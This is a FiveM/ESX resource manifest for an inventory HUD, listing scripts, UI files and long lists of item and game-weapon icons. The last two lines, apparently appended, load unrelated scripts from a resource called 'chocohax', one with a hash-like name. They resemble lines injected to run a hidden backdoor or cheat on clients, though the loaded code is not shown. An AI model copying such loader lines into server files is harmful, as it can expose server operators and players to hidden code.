resource_manifest_version "44febabe-d386-4d18-afbe-5e627f4af937"

description 'ESX Inventory HUD'

version '1.1'

ui_page 'html/ui.html'

client_scripts {
  '@es_extended/locale.lua',
  '@mysql-async/lib/MySQL.lua',
  'client/main.lua',
  'locales/cs.lua',
  'locales/en.lua',
  'locales/fr.lua',
  'config.lua'	
}

server_scripts {
  '@es_extended/locale.lua',
  '@mysql-async/lib/MySQL.lua',
  'server/main.lua',
  'locales/cs.lua',
  'locales/en.lua',
  'locales/fr.lua',
  'config.lua'	
}

files {
    'html/ui.html',
    'html/css/materialize.css',
    'html/css/ui.css',
    'html/css/jquery-ui.css',
	  'html/js/jquery.min.js',
    'html/js/inventory.js',
    'html/js/config.js',
    'html/js/materialize.min.js',
    -- JS LOCALES
    'html/locales/cs.js',
    'html/locales/en.js',
    'html/locales/fr.js',
    -- IMAGES
    "html/img/bullet.png",
  -- ICONS
  "html/img/items/**.png",
  "html/img/items/vine.png",
  "html/img/items/jus_raisin.png",
  "html/img/items/grand_cru.png",
  "html/img/items/raisin.png",
  "html/img/items/fish.png",
  "html/img/items/fishingrod.png",
  "html/img/items/bait.png",
  "html/img/items/bandage.png",
  "html/img/items/beer.png",
  "html/img/items/binoculars.png",
  "html/img/items/bread.png",
  "html/img/items/cannabis.png",
  "html/img/items/cigarette.png",
  "html/img/items/clip.png",
  "html/img/items/cocacola.png",
  "html/img/items/coffee.png",
  "html/img/items/coke.png",
  "html/img/items/coke_pooch.png",
  "html/img/items/meth.png",
  "html/img/items/meth_pooch.png",
  "html/img/items/opium.png",
  "html/img/items/opium_pooch.png",
  "html/img/items/weed.png",
  "html/img/items/weed_pooch.png",
  "html/img/items/gold.png",
  "html/img/items/icetea.png",
  "html/img/items/sandwich.png",
  "html/img/items/papers.png",
  "html/img/items/hamburger.png",
  "html/img/items/wine.png",
  "html/img/items/cash.png",
  "html/img/items/chocolate.png",
  "html/img/items/iron.png",
  "html/img/items/jewels.png",
  "html/img/items/medikit.png",
  "html/img/items/tequila.png",
  "html/img/items/whisky.png",
  "html/img/items/limonade.png",
  "html/img/items/phone.png",
  "html/img/items/vodka.png",
  "html/img/items/water.png",
  "html/img/items/cupcake.png",
  "html/img/items/drpepper.png",
  "html/img/items/energy.png",
  "html/img/items/croquettes.png",
  "html/img/items/bolpistache.png",
  "html/img/items/bolnoixcajou.png",
  "html/img/items/bolcacahuetes.png",
  "html/img/items/fixkit.png",
  "html/img/items/bolchips.png",
  "html/img/items/black_chip.png",
  "html/img/items/black_money.png",
  "html/img/items/gym_membership.png",
  "html/img/items/bitcoin02.png",
  "html/img/items/bitcoin.png",
  "html/img/items/beef.png",
  "html/img/items/cypress.png",
  "html/img/items/glass.png",
  "html/img/items/gunpost01.png",
  "html/img/items/gunpost02.png",
  "html/img/items/lamb.png",
  "html/img/items/lither.png",
  "html/img/items/nami.png",
  "html/img/items/nylon.png",
  "html/img/items/olein.png",
  "html/img/items/paper.png",
  "html/img/items/pork.png",
  "html/img/items/resin.png",
  "html/img/items/carbon.png",
  "html/img/items/gacha_01.png",
  "html/img/items/gacha_02.png",
  "html/img/items/gacha_03.png",
  "html/img/items/WEAPON_FIREWORK.png",
  "html/img/items/licenseplate.png", 
  "html/img/items/pandacoin.png", 
  "html/img/items/gundesign01.png",
  "html/img/items/boat_license.png",
  "html/img/items/helicopter_license.png",
  "html/img/items/gdmetal.png",
  "html/img/items/beefnoodles.png",
  "html/img/items/chickenbento.png",
  "html/img/items/cola.png",
  "html/img/items/gravalemontea.png",
  "html/img/items/milktea.png",
  "html/img/items/porkrice.png",
  "html/img/items/blowtorch.png",
  "html/img/items/coca_leaf.png",
  "html/img/items/gundesign02.png",
  "html/img/items/heroin.png",
  "html/img/items/hifi.png",
  "html/img/items/lotteryticket.png",
  "html/img/items/moneywashid.png",
  "html/img/items/poppyresin.png",
  "html/img/items/rasperry.png",
  "html/img/items/lockpick.png",
  "html/img/items/marijuana.png",
  "html/img/items/sodium_hydroxide.png",
  "html/img/items/sulfuric_acid.png",
  "html/img/items/hydrochloric_acid.png",
  "html/img/items/meth.png",
  "html/img/items/chemicals.png",
  "html/img/items/lsa.png",
  "html/img/items/lsd.png",
  "html/img/items/thionyl_chloride.png",
  "html/img/items/gps.png",
  "html/img/items/chemicalslisence.png",
  "html/img/items/weaponAcc_Skin.png" ,
  "html/img/items/weaponAcc_Add.png" ,
  "html/img/items/weaponAcc_Color.png" ,
  "html/img/items/weaponAcc_Remove.png" ,
  "html/img/items/warranty01.png" ,
  "html/img/items/warranty02.png" ,
  "html/img/items/gunkey.png" ,
  "html/img/items/contract.png" ,
  "html/img/items/thiefcontract.png" ,
  "html/img/items/airbig01.png" ,
  "html/img/items/airbig02.png" ,
  "html/img/items/boatbig01.png" ,
  "html/img/items/boatbig02.png" ,
  "html/img/items/antibiotico.png" ,
  "html/img/items/antibioticorosacea.png" ,
  "html/img/items/panda_id_card.png" ,
  "html/img/items/sciroppo.png" ,
  "html/img/items/thiefcontract.png" ,
  "html/img/items/ems_work1.png" ,
  "html/img/items/ems_work2.png" ,
  "html/img/items/ems_work3.png" ,
  "html/img/items/weddingring.png" ,
  "html/img/items/certificate.png" ,
  "html/img/items/carremote.png" ,
  "html/img/items/newmarrybook.png" ,
  "html/img/items/divorce.png" ,
  "html/img/items/decorate.png" ,
  "html/img/items/setblip.png" ,
  "html/img/items/car50off.png" ,
  "html/img/items/car60off.png" ,
  "html/img/items/car70off.png" ,
  "html/img/items/gadget_parachute.png" ,
  "html/img/items/nitro.png" ,
  "html/img/items/lolipoop.png",
  "html/img/items/sandwich.png",
  "html/img/items/icetea.png",
  "html/img/items/soda.png",
  "html/img/items/newb_gift.png",
--武器


  "html/img/items/WEAPON_ADVANCEDRIFLE.png",
  "html/img/items/WEAPON_APPISTOL.png",
  "html/img/items/WEAPON_ASSAULTRIFLE.png",
  "html/img/items/WEAPON_ASSAULTRIFLE_MK2.png",
  "html/img/items/WEAPON_ASSAULTSHOTGUN.png",
  "html/img/items/WEAPON_ASSAULTSMG.png",
  "html/img/items/WEAPON_BALL.png",
  "html/img/items/WEAPON_BAT.png",
  "html/img/items/WEAPON_BOTTLE.png",
  "html/img/items/WEAPON_BULLPUPRIFLE_MK2.png",
  "html/img/items/WEAPON_BULLPUPSHOTGUN.png",
  "html/img/items/WEAPON_BZGAS.png",
  "html/img/items/WEAPON_CARBINERIFLE.png",
  "html/img/items/WEAPON_CARBINERIFLE_MK2.png",
  "html/img/items/WEAPON_COMBATMG.png",
  "html/img/items/WEAPON_COMBATMG_MK2.png",
  "html/img/items/WEAPON_COMBATPDW.png",
  "html/img/items/WEAPON_COMBATPISTOL.png",
  "html/img/items/WEAPON_COMPACTLAUNCHER.png",
  "html/img/items/WEAPON_COMPACTRIFLE.png",
  "html/img/items/WEAPON_CROWBAR.png",
  "html/img/items/WEAPON_DAGGER.png",
  "html/img/items/WEAPON_DBSHOTGUN.png",
  "html/img/items/WEAPON_DOUBLEACTION.png",
  "html/img/items/WEAPON_FIREEXTINGUISHER.png",
  "html/img/items/WEAPON_FIREWORK.png",
  "html/img/items/WEAPON_FLARE.png",
  "html/img/items/WEAPON_FLAREGUN.png",
  "html/img/items/WEAPON_FLASHLIGHT.png",
  "html/img/items/WEAPON_GOLFCLUB.png",
  "html/img/items/WEAPON_GRENADE.png",
  "html/img/items/WEAPON_GRENADELAUNCHER.png",
  "html/img/items/WEAPON_GRENADELAUNCHER_SMOKE.png",
  "html/img/items/WEAPON_GUSENBERG.png",
  "html/img/items/WEAPON_HAMMER.png",
  "html/img/items/WEAPON_HATCHET.png",
  "html/img/items/WEAPON_HEAVYPISTOL.png",
  "html/img/items/WEAPON_HEAVYSHOTGUN.png",
  "html/img/items/WEAPON_HEAVYSNIPER.png",
  "html/img/items/WEAPON_HEAVYSNIPER_MK2.png",
  "html/img/items/WEAPON_HOMINGLAUNCHER.png",
  "html/img/items/WEAPON_KNIFE.png",
  "html/img/items/WEAPON_KNUCKLE.png",
  "html/img/items/WEAPON_MACHETE.png",
  "html/img/items/WEAPON_MACHINEPISTOL.png",
  "html/img/items/WEAPON_MARKSMANPISTOL.png",
  "html/img/items/WEAPON_MARKSMANRIFLE.png",
  "html/img/items/WEAPON_MARKSMANRIFLE_MK2.png",
  "html/img/items/WEAPON_MG.png",
  "html/img/items/WEAPON_MICROSMG.png",
  "html/img/items/WEAPON_MINIGUN.png",
  "html/img/items/WEAPON_MINISMG.png",
  "html/img/items/WEAPON_MOLOTOV.png",
  "html/img/items/WEAPON_MUSKET.png",
  "html/img/items/WEAPON_NIGHTSTICK.png",
  "html/img/items/WEAPON_PETROLCAN.png",
  "html/img/items/WEAPON_PIPEWRENCH.png",
  "html/img/items/WEAPON_PISTOL.png",
  "html/img/items/WEAPON_PISTOL_MK2.png",
  "html/img/items/WEAPON_PISTOL50.png",
  "html/img/items/WEAPON_POOLCUE.png",
  "html/img/items/WEAPON_PROXMINE.png",
  "html/img/items/WEAPON_PUMPSHOTGUN.png",
  "html/img/items/WEAPON_PUMPSHOTGUN_MK2.png",
  "html/img/items/WEAPON_RAILGUN.png",
  "html/img/items/WEAPON_REVOLVER.png",
  "html/img/items/WEAPON_REVOLVER_MK2.png",
  "html/img/items/WEAPON_RPG.png",
  "html/img/items/WEAPON_SAWNOFFSHOTGUN.png",
  "html/img/items/WEAPON_SMG.png",
  "html/img/items/WEAPON_SMG_MK2.png",
  "html/img/items/WEAPON_SMOKEGRENADE.png",
  "html/img/items/WEAPON_SNIPERRIFLE.png",
  "html/img/items/WEAPON_SNOWBALL.png",
  "html/img/items/WEAPON_SNSPISTOL.png",
  "html/img/items/WEAPON_SNSPISTOL_MK2.png",
  "html/img/items/WEAPON_SPECIALCARBINE.png",
  "html/img/items/WEAPON_SPECIALCARBINE_MK2.png",
  "html/img/items/WEAPON_STICKYBOMB.png",
  "html/img/items/WEAPON_STUNGUN.png",
  "html/img/items/WEAPON_SWEEPERSHOTGUN.png",
  "html/img/items/WEAPON_SWITCHBLADE.png",
  "html/img/items/WEAPON_VINTAGEPISTOL.png",
  "html/img/items/WEAPON_BULLPUPRIFLE.png",
  "html/img/items/WEAPON_PIDEWRENCH.png",
  "html/img/items/WEAPON_WRENCH.png",
  "html/img/items/WEAPON_PIPEBOMB.png",
  "html/img/items/WEAPON_BATTLEAXE.png",
  "html/img/items/WEAPON_AUTOSHOTGUN.png",
  "html/img/items/WEAPON_STONE_HATCHET.png",




  -- Lenzh_chopshop
  "html/img/items/battery.png",
  "html/img/items/lowradio.png",
  "html/img/items/stockrim.png",
  "html/img/items/airbag.png",
  "html/img/items/highradio.png",
  "html/img/items/highrim.png",

  "html/img/items/bag.png",
  "html/img/items/c4_bank.png",
  "html/img/items/clip.png",
  "html/img/items/fishingrod.png",
  "html/img/items/oxygen_mask.png",
  "html/img/items/seed_weed.png",
  "html/img/items/bottle.png",
  "html/img/items/bulletproof.png",
  "html/img/items/camera.png",
  "html/img/items/clothe.png",
  "html/img/items/copper.png",
  "html/img/items/cutted_wood.png",
  "html/img/items/darknet.png",
  "html/img/items/fabric.png",
  "html/img/items/fishbait.png",
  "html/img/items/gazbottle.png",
  "html/img/items/packaged_chicken.png",
  "html/img/items/packaged_plank.png",
  "html/img/items/petrol.png",
  "html/img/items/ring.png",
  "html/img/items/rolex.png",
  "html/img/items/sacbillets.png",
  "html/img/items/samsungS10.png",
  "html/img/items/slaughtered_chicken.png",
  "html/img/items/stone.png",
  "html/img/items/washed_stone.png",
  "html/img/items/whool.png",
  "html/img/items/wood.png",
  "html/img/items/alive_chicken.png",
  "html/img/items/diamond.png",
}
client_script '@chocohax/95158.lua'
client_script '@chocohax/3a8edc97804897d949f78eac09528d6204ce579e0a.lua'